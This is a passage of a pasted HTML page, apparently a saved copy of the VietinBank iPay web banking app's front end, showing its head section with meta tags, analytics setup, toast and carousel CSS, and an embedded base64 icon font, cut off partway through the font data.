codebank
unknown
abc
3 years ago
406 kB
5
Indexable
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no, maximum-scale=1.0, user-scalable=no"> <meta name="theme-color" content="#000000"> <!-- manifest.json provides metadata used when your web app is added to the homescreen on Android. See https://developers.google.com/web/fundamentals/engage-and-retain/web-app-manifest/ --> <link rel="shortcut icon" href="/favicon.ico"> <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png"> <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png"> <link rel="manifest" href="/manifest.json"> <!-- meta tags --> <title>VietinBank iPay</title> <meta name="description" content="Welcome to VietinBank iPay!"> <meta name="keywords" content="VietinBank, iPay, VietinBank iPay"> <meta name="author" content="VietinBank"> <!-- facebook meta tags --> <meta property="og:url" content="https://ipay.vietinbank.vn"> <meta property="og:type" content="article"> <meta property="og:title" content="VietinBank iPay"> <meta property="og:description" content="Welcome to VietinBank iPay!"> <meta property="og:image" content="https://ipay.vietinbank.vn/logo.png"> <!-- load fonts - icon font --> <!-- <link href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,500,600,700|Dancing+Script:300,400,500,600,700|Material+Icons" rel="stylesheet"> --> <!-- <link href="https://use.fontawesome.com/releases/v5.0.13/css/all.css" rel="stylesheet"> --> <link href="/static/fonts/style.css" rel="stylesheet"> <!-- Global site tag (gtag.js) - Google Analytics --> <script async="" src="https://www.googletagmanager.com/gtag/js?id=G-QY3N1CT7RM"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-QY3N1CT7RM'); </script> <script> console.log('Version: 1.1.6') </script> <style type="text/css">.Toastify__toast-container { z-index: 9999; -webkit-transform: translate3d(0, 0, 9999px); position: fixed; padding: 4px; width: 320px; box-sizing: border-box; color: #fff; } .Toastify__toast-container--top-left { top: 1em; left: 1em; } .Toastify__toast-container--top-center { top: 1em; left: 50%; margin-left: -160px; } .Toastify__toast-container--top-right { top: 1em; right: 1em; } .Toastify__toast-container--bottom-left { bottom: 1em; left: 1em; } .Toastify__toast-container--bottom-center { bottom: 1em; left: 50%; margin-left: -160px; } .Toastify__toast-container--bottom-right { bottom: 1em; right: 1em; } @media only screen and (max-width: 480px) { .Toastify__toast-container { width: 100vw; padding: 0; left: 0; margin: 0; } .Toastify__toast-container--top-left, .Toastify__toast-container--top-center, .Toastify__toast-container--top-right { top: 0; } .Toastify__toast-container--bottom-left, .Toastify__toast-container--bottom-center, .Toastify__toast-container--bottom-right { bottom: 0; } .Toastify__toast-container--rtl { right: 0; left: initial; } } .Toastify__toast { position: relative; min-height: 64px; box-sizing: border-box; margin-bottom: 1rem; padding: 8px; border-radius: 1px; box-shadow: 0 1px 10px 0 rgba(0, 0, 0, 0.1), 0 2px 15px 0 rgba(0, 0, 0, 0.05); display: -ms-flexbox; display: flex; -ms-flex-pack: justify; justify-content: space-between; max-height: 800px; overflow: hidden; font-family: sans-serif; cursor: pointer; direction: ltr; } .Toastify__toast--rtl { direction: rtl; } .Toastify__toast--default { background: #fff; color: #aaa; } .Toastify__toast--info { background: #3498db; } .Toastify__toast--success { background: #07bc0c; } .Toastify__toast--warning { background: #f1c40f; } .Toastify__toast--error { background: #e74c3c; } .Toastify__toast-body { margin: auto 0; -ms-flex: 1; flex: 1; } @media only screen and (max-width: 480px) { .Toastify__toast { margin-bottom: 0; } } .Toastify__close-button { color: #fff; font-weight: bold; font-size: 14px; background: transparent; outline: none; border: none; padding: 0; cursor: pointer; opacity: 0.7; transition: 0.3s ease; -ms-flex-item-align: start; align-self: flex-start; } .Toastify__close-button--default { color: #000; opacity: 0.3; } .Toastify__close-button:hover, .Toastify__close-button:focus { opacity: 1; } @keyframes Toastify__trackProgress { 0% { transform: scaleX(1); } 100% { transform: scaleX(0); } } .Toastify__progress-bar { position: absolute; bottom: 0; left: 0; width: 100%; height: 5px; z-index: 9999; opacity: 0.7; background-color: rgba(255, 255, 255, 0.7); transform-origin: left; } .Toastify__progress-bar--animated { animation: Toastify__trackProgress linear 1 forwards; } .Toastify__progress-bar--controlled { transition: transform .2s; } .Toastify__progress-bar--rtl { right: 0; left: initial; transform-origin: right; } .Toastify__progress-bar--default { background: linear-gradient(to right, #4cd964, #5ac8fa, #007aff, #34aadc, #5856d6, #ff2d55); } @keyframes Toastify__bounceInRight { from, 60%, 75%, 90%, to { animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1); } from { opacity: 0; transform: translate3d(3000px, 0, 0); } 60% { opacity: 1; transform: translate3d(-25px, 0, 0); } 75% { transform: translate3d(10px, 0, 0); } 90% { transform: translate3d(-5px, 0, 0); } to { transform: none; } } @keyframes Toastify__bounceOutRight { 20% { opacity: 1; transform: translate3d(-20px, 0, 0); } to { opacity: 0; transform: translate3d(2000px, 0, 0); } } @keyframes Toastify__bounceInLeft { from, 60%, 75%, 90%, to { animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1); } 0% { opacity: 0; transform: translate3d(-3000px, 0, 0); } 60% { opacity: 1; transform: translate3d(25px, 0, 0); } 75% { transform: translate3d(-10px, 0, 0); } 90% { transform: translate3d(5px, 0, 0); } to { transform: none; } } @keyframes Toastify__bounceOutLeft { 20% { opacity: 1; transform: translate3d(20px, 0, 0); } to { opacity: 0; transform: translate3d(-2000px, 0, 0); } } @keyframes Toastify__bounceInUp { from, 60%, 75%, 90%, to { animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1); } from { opacity: 0; transform: translate3d(0, 3000px, 0); } 60% { opacity: 1; transform: translate3d(0, -20px, 0); } 75% { transform: translate3d(0, 10px, 0); } 90% { transform: translate3d(0, -5px, 0); } to { transform: translate3d(0, 0, 0); } } @keyframes Toastify__bounceOutUp { 20% { transform: translate3d(0, -10px, 0); } 40%, 45% { opacity: 1; transform: translate3d(0, 20px, 0); } to { opacity: 0; transform: translate3d(0, -2000px, 0); } } @keyframes Toastify__bounceInDown { from, 60%, 75%, 90%, to { animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1); } 0% { opacity: 0; transform: translate3d(0, -3000px, 0); } 60% { opacity: 1; transform: translate3d(0, 25px, 0); } 75% { transform: translate3d(0, -10px, 0); } 90% { transform: translate3d(0, 5px, 0); } to { transform: none; } } @keyframes Toastify__bounceOutDown { 20% { transform: translate3d(0, 10px, 0); } 40%, 45% { opacity: 1; transform: translate3d(0, -20px, 0); } to { opacity: 0; transform: translate3d(0, 2000px, 0); } } .Toastify__bounce-enter--top-left, .Toastify__bounce-enter--bottom-left { animation-name: Toastify__bounceInLeft; } .Toastify__bounce-enter--top-right, .Toastify__bounce-enter--bottom-right { animation-name: Toastify__bounceInRight; } .Toastify__bounce-enter--top-center { animation-name: Toastify__bounceInDown; } .Toastify__bounce-enter--bottom-center { animation-name: Toastify__bounceInUp; } .Toastify__bounce-exit--top-left, .Toastify__bounce-exit--bottom-left { animation-name: Toastify__bounceOutLeft; } .Toastify__bounce-exit--top-right, .Toastify__bounce-exit--bottom-right { animation-name: Toastify__bounceOutRight; } .Toastify__bounce-exit--top-center { animation-name: Toastify__bounceOutUp; } .Toastify__bounce-exit--bottom-center { animation-name: Toastify__bounceOutDown; } @keyframes Toastify__zoomIn { from { opacity: 0; transform: scale3d(0.3, 0.3, 0.3); } 50% { opacity: 1; } } @keyframes Toastify__zoomOut { from { opacity: 1; } 50% { opacity: 0; transform: scale3d(0.3, 0.3, 0.3); } to { opacity: 0; } } .Toastify__zoom-enter { animation-name: Toastify__zoomIn; } .Toastify__zoom-exit { animation-name: Toastify__zoomOut; } @keyframes Toastify__flipIn { from { transform: perspective(400px) rotate3d(1, 0, 0, 90deg); animation-timing-function: ease-in; opacity: 0; } 40% { transform: perspective(400px) rotate3d(1, 0, 0, -20deg); animation-timing-function: ease-in; } 60% { transform: perspective(400px) rotate3d(1, 0, 0, 10deg); opacity: 1; } 80% { transform: perspective(400px) rotate3d(1, 0, 0, -5deg); } to { transform: perspective(400px); } } @keyframes Toastify__flipOut { from { transform: perspective(400px); } 30% { transform: perspective(400px) rotate3d(1, 0, 0, -20deg); opacity: 1; } to { transform: perspective(400px) rotate3d(1, 0, 0, 90deg); opacity: 0; } } .Toastify__flip-enter { animation-name: Toastify__flipIn; } .Toastify__flip-exit { animation-name: Toastify__flipOut; } @keyframes Toastify__slideInRight { from { transform: translate3d(110%, 0, 0); visibility: visible; } to { transform: translate3d(0, 0, 0); } } @keyframes Toastify__slideInLeft { from { transform: translate3d(-110%, 0, 0); visibility: visible; } to { transform: translate3d(0, 0, 0); } } @keyframes Toastify__slideInUp { from { transform: translate3d(0, 110%, 0); visibility: visible; } to { transform: translate3d(0, 0, 0); } } @keyframes Toastify__slideInDown { from { transform: translate3d(0, -110%, 0); visibility: visible; } to { transform: translate3d(0, 0, 0); } } @keyframes Toastify__slideOutRight { from { transform: translate3d(0, 0, 0); } to { visibility: hidden; transform: translate3d(110%, 0, 0); } } @keyframes Toastify__slideOutLeft { from { transform: translate3d(0, 0, 0); } to { visibility: hidden; transform: translate3d(-110%, 0, 0); } } @keyframes Toastify__slideOutDown { from { transform: translate3d(0, 0, 0); } to { visibility: hidden; transform: translate3d(0, 500px, 0); } } @keyframes Toastify__slideOutUp { from { transform: translate3d(0, 0, 0); } to { visibility: hidden; transform: translate3d(0, -500px, 0); } } .Toastify__slide-enter--top-left, .Toastify__slide-enter--bottom-left { animation-name: Toastify__slideInLeft; } .Toastify__slide-enter--top-right, .Toastify__slide-enter--bottom-right { animation-name: Toastify__slideInRight; } .Toastify__slide-enter--top-center { animation-name: Toastify__slideInDown; } .Toastify__slide-enter--bottom-center { animation-name: Toastify__slideInUp; } .Toastify__slide-exit--top-left, .Toastify__slide-exit--bottom-left { animation-name: Toastify__slideOutLeft; } .Toastify__slide-exit--top-right, .Toastify__slide-exit--bottom-right { animation-name: Toastify__slideOutRight; } .Toastify__slide-exit--top-center { animation-name: Toastify__slideOutUp; } .Toastify__slide-exit--bottom-center { animation-name: Toastify__slideOutDown; }</style><style type="text/css">/* Slider */ .slick-slider { position: relative; display: block; box-sizing: border-box; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; -webkit-touch-callout: none; -khtml-user-select: none; -ms-touch-action: pan-y; touch-action: pan-y; -webkit-tap-highlight-color: transparent; } .slick-list { position: relative; display: block; overflow: hidden; margin: 0; padding: 0; } .slick-list:focus { outline: none; } .slick-list.dragging { cursor: pointer; cursor: hand; } .slick-slider .slick-track, .slick-slider .slick-list { -webkit-transform: translate3d(0, 0, 0); -moz-transform: translate3d(0, 0, 0); -ms-transform: translate3d(0, 0, 0); -o-transform: translate3d(0, 0, 0); transform: translate3d(0, 0, 0); } .slick-track { position: relative; top: 0; left: 0; display: block; margin-left: auto; margin-right: auto; } .slick-track:before, .slick-track:after { display: table; content: ''; } .slick-track:after { clear: both; } .slick-loading .slick-track { visibility: hidden; } .slick-slide { display: none; float: left; height: 100%; min-height: 1px; } [dir='rtl'] .slick-slide { float: right; } .slick-slide img { display: block; } .slick-slide.slick-loading img { display: none; } .slick-slide.dragging img { pointer-events: none; } .slick-initialized .slick-slide { display: block; } .slick-loading .slick-slide { visibility: hidden; } .slick-vertical .slick-slide { display: block; height: auto; border: 1px solid transparent; } .slick-arrow.slick-hidden { display: none; } </style><style type="text/css">@charset 'UTF-8'; /* Slider */ .slick-loading .slick-list { background: #fff url(/static/media/ajax-loader.c5cd7f53.gif) center center no-repeat; } /* Icons */ @font-face { font-family: 'slick'; font-weight: normal; font-style: normal; src: url(data:application/font-woff;base64,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); src: url(data:application/font-woff;base64,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?#iefix) format('embedded-opentype'), url(data:application/font-woff;base64,d09GRk9UVE8AAAVkAAsAAAAAB1wAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAABDRkYgAAABCAAAAi4AAAKbH/pWDkZGVE0AAAM4AAAAGgAAABxt0civR0RFRgAAA1QAAAAcAAAAIAAyAARPUy8yAAADcAAAAFIAAABgUBj/rmNtYXAAAAPEAAAAUAAAAWIiC0SwaGVhZAAABBQAAAAuAAAANgABMftoaGVhAAAERAAAABwAAAAkA+UCA2htdHgAAARgAAAADgAAAA4ESgBKbWF4cAAABHAAAAAGAAAABgAFUABuYW1lAAAEeAAAANwAAAFuBSeBwnBvc3QAAAVUAAAAEAAAACAAAwABeJw9ks9vEkEUx2cpWyeUoFYgNkHi2Wt7N3rVm3cTs3UVLC4LxIWEQvi1P3i7O1tYLJDAmlgKGEhQrsajf0j7J3jYTXrQWUrMJG+++b55n5e8NwwKBhHDMLv5kxT3ATEBxKBn3qOAl9zxHgb1MAPhHQgHkyF08Gr/L8B/Eb6zWnmCJ7AJVLubQOheArXvJ1A4EXi6j4I+Zg9F0QFKvsnlBCmXeve+sFEnb/nCptdtQ4QYhVFRAT1HrF8UQK/RL/SbmUbclsvGVFXRZKDHUE38cc4qpkbAAsuwiImvro+ufcfaOIQ6szlrmjRJDaKZKnbjN3GWKIbiIzRFUfCffuxxKOL+3LDlDVvx2TdxN84qZEsnhNBa6pgm2dAsnzbLsETdsmRFxUeHV4e+I2/ptN8TyqV8T3Dt29t7EYOuajVIw2y1Wy3M86w0zg/Fz2IvawmQAUHOVrPVfLkoScVynsqsTG0MGUs4z55nh3mnOJa+li+rl9WpPIcFfDubDeaDC+fLBdYN3QADzLauGfj4B6sZmq6CCpqmtSvF0qlUl2qf5AJIUCSlTqlb7lUG+LRfGzZGzZEyBgccMu6MuqPecNDvD4Y9Kjtj4gD+DsvKVMTcMdtqtZtmkzQstQvYje7Syep0PDSAhSOeHYXYWThEF//A/0YvYV1fSQtpKU5STtrhbQ444OtpKSWJIg3pOg8cBs7maTY1EZf07aq+hjWs7IWzdCYTGhb2CtZ47x+Uhx28AAB4nGNgYGBkAIJz765vANHnCyvqYTQAWnkHswAAeJxjYGRgYOADYgkGEGBiYARCFjAG8RgABHYAN3icY2BmYmCcwMDKwMHow5jGwMDgDqW/MkgytDAwMDGwcjKAQQMDAyOQUmCAgoA01xQGB4ZExUmMD/4/YNBjvP3/NgNEDQPjbbBKBQZGADfLDgsAAHicY2BgYGaAYBkGRgYQiAHyGMF8FgYHIM3DwMHABGQzMCQqKClOUJz0/z9YHRLv/+L7D+8V3cuHmgAHjGwM6ELUByxUMIOZCmbgAAA5LQ8XeJxjYGRgYABiO68w73h+m68M3EwMIHC+sKIeTqsyqDLeZrwN5HIwgKUB/aYJUgAAeJxjYGRgYLzNwMCgx8QAAkA2IwMqYAIAMGIB7QIAAAACAAAlACUAJQAlAAAAAFAAAAUAAHicbY49asNAEIU/2ZJDfkiRIvXapUFCEqpcptABUrg3ZhEiQoKVfY9UqVLlGDlADpAT5e16IUWysMz3hjfzBrjjjQT/EjKpCy+4YhN5yZoxcirPe+SMWz4jr6S+5UzSa3VuwpTnBfc8RF7yxDZyKs9r5IxHPiKv1P9iZqDnyAvMQ39UecbScVb/gJO03Xk4CFom3XYK1clhMdQUlKo7/d9NF13RkIdfy+MV7TSe2sl11tRFaXYmJKpWTd7kdVnJ8veevZKc+n3I93t9Jnvr5n4aTVWU/0z9AI2qMkV4nGNgZkAGjAxoAAAAjgAF) format('woff'), url(data:application/font-woff;base64,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